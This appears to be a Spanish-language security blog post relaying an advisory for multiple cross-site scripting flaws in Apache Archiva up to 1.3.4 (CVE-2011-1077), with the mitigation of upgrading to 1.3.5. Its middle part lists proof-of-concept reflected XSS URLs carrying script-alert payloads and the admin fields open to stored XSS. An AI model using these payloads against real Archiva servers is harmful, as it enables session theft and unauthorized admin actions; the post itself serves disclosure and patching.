Nueva Vulnerabilidad en Apache

Noticias, Updates, de Seguridad

#Apache #Archiva Multiple #XSS #vulnerabilities

Esto es con respecto a varios XSS (Cross Site Scripting) Vulnerabilidades en Archiva Apache 1.3.4 (y versiones anteriores).

Proyecto: Archiva Apache
Severidad: Alta
Versiones: 1.3.0 – 1.3.4. Las versiones no compatibles Archiva 1.0 – 1.2.2  también se ven afectados.
Tipo Exploit: Múltiples XSS
Mitigación: Archiva 1.3.4 y anteriores usuarios deben actualizar a 1.3.5
Dirección del vendedor: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077

Detalles de la vulnerabilidad:
El usuario puede insertar código HTML o ejecutar código JavaScript arbitrario en la aplicación vulnerable. Las vulnerabilidades se presentan debido a la insuficiencia de de validación de entradas en los campos de entrada múltiples a través de la aplicación. Una explotación exitosa de esta vulnerabilidad podría provocar, pero no limitado a, el compromiso de la solicitud, el robo basado en cookies credenciales de autenticación, la redirección de URL arbitrarios, divulgación o modificación de datos confidenciales y ataques de phishing.

Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifactId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Persistant (Stored) XSS:
Exploit code: testhttp://127.0.0.1:8080/archiva/admin/addRepository.action
(Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action (Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId,Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action
http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action
(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

Esperando que esta inforamción sea de utilidad

Reciban un cordial Saludo.

Comparte este Post:

Tags: , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

Deja un comentario





October 2018
M T W T F S S
« Oct    
1234567
891011121314
15161718192021
22232425262728
293031  
wordpress visitors